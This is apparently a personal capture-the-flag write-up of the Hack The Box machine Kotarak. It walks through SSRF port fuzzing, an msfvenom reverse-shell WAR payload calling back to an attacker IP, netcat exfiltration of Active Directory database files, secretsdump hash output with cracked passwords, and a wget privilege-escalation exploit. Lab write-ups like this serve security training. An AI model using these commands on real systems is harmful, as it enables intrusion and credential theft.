O
O
OSCP Notes
Search
⌃K

HTB Write-up Kotarak

nmap:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
| 256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_ 256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
1112/tcp filtered msql
6002/tcp filtered X11:2
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE OPTIONS
| Potentially risky methods: PUT DELETE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat 8.5.5
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5 - Error report
10009/tcp filtered swdtp-sv
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
8009 enum:
PORT STATE SERVICE VERSION
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-request:
| AJP/1.3 404 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 992
|
|_<!DOCTYPE html><html><head><title>Apache Tomcat/8.5.5 - Error report</title><style type="text/css">H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}.line {height: 1px; background-color: #525D76; border: none;}</style> </head><body><h1>HTTP Status 404 - /</h1><div class="line"></div><p><b>type</b> Status report</p><p><b>message</b> <u>/</u></p><p><b>description</b> <u>The requested resource is not available.</u></p><hr class="line"><h3>Apache Tomcat/8.5.5</h3></body></html>
| ajp-headers:
| Content-Type: text/html;charset=utf-8
| Content-Language: en
|_ Content-Length: 992
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE OPTIONS
| Potentially risky methods: PUT DELETE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080 enum:
Apache Tomcat/8.5.5
dirsearch result:
`
/examples/
index,jsp
manager
index.jsp took me to the tomcat page:
Attempted logging in to host-manager butI ot this
s3cret?
tomcat -s3cret didn't work..lol
After running the full scan, I found port 60000 open
possibly LFI vuln?
it looks like you can enter any url to browse so I entered my own and served http server.
it worked.
if we see ueragent here we could exploit it but not this time.
Let's enter some values like file://etc/passwd
ok..
Now we can fuzz the local ports with wfuzz
wfuzz -z range,1-65535 http://10.129.1.117:60000/url.php\?path=http://localhost:FUZZ
got a bunch of 2Ls so let's modify our command
wfuzz -z range,1-65535 http://10.129.1.117:60000/url.php\?path=http://localhost:FUZZ
wfuzz -z range,1-65535 --hl=2 http://10.129.1.117:60000/url.php\?path=http://localhost:FUZZ
  • --hl=2 will omit the result with 2L
We can see some stuff coming back.
onport 888,found a file server
After URL encoding the last part of the request with burp, I was able to see the content
username: admin
password: [email protected]!
Now we are finally in the admin portal.
Make a war shell code with msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.14 LPORT=7777 -f war > shell.war
Got a initial shell back after deploy the war file and started a nc listner.
spawn the shell. python -c 'import pty;pty.spawn("/bin/bash")'
backups looks interesting
find . --> useful to find hidden files.
Started a listner on kali : nc -nvlp 443 > SYSTEM
nc 10.10.16.14 443 < 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
did the same for other file.
Now we've got the two files on our machine.

What is the NTDS.dit File?

The NTDS.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. By extracting these hashes, it is possible to use tools such as Mimikatz to perform pass-the-hash attacks, or tools like Hashcat to crack these passwords. The extraction and cracking of these passwords can be performed offline, so they will be undetectable. Once an attacker has extracted these hashes, they are able to act as any user on the domain, including Domain Administrators.

Extracting Hashes and Domain Info From .dit

If you have the NTDS.dit file and the SYSTEM hive, you can simply use the secretsdump.py from impacket to extract all the NT hashes, but before we begin we need to download the files locally so we can extract the database information. I’m going to create a simple python HTTP server to transfer the files from the remote victim machine to my local machine.
it took forever to download these files! I tried the nc methods but I couldn't see the progress so files kept corrupting
python secretsdump.py -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin LOCAL
Output
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Time to crack some hashes!
Since the box is not windows, we have to crack them. And we don't care about the ones with $
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
separate them before the fourth colon.
Used this site to crack them.
admin cracked:
f16tomcat!
atanas - Password123!
Let's try ssh into these.
couldn't get in...
tried using su - atanas with the other password and it worked.
it looks like ssh is not enabled for this account.

Priv Esc

in root folder, we ca actually read app.log and flag.txt
wget 1.16...
let's do searchsploit to see what we have.
  1. 1.
    Pasted the wget.rc content in /dev/shm folder
you cannot run python server on 21 but the box has a program called authbind installed and it bypasses it
uploading wget exploit file to the victim (modified some parts)
used wget -r http://IP/exploit.py to transfer the file.
changed the http listening port to 0.0.0.0
in summary: we need to have python server & the ftp on the victims machine
and nc running on attacker's.
/root/hacked-via-wget